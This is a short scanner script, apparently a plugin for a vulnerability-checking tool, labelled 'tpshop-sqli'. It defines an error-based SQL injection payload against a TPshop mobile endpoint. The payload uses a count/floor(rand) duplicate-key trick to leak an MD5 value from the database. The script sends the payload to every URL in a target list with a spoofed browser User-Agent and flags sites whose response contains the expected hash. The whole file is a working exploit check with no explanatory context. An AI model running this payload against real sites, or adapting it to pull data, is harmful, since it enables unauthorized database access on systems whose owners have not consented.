#request urls = array
#define payload = /mobile/index/index2/id/1) and (select 1 from (select count(*),concat(0x716b627671,(select md5(99999999)),0x716b627671,floor(rand(0)*2))x from information_schema.tables group by x)a)--
#define bug = ef775988943825d2871e1cfa75473ec
#define info = tpshop-sqli

function main(args){
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
	
}
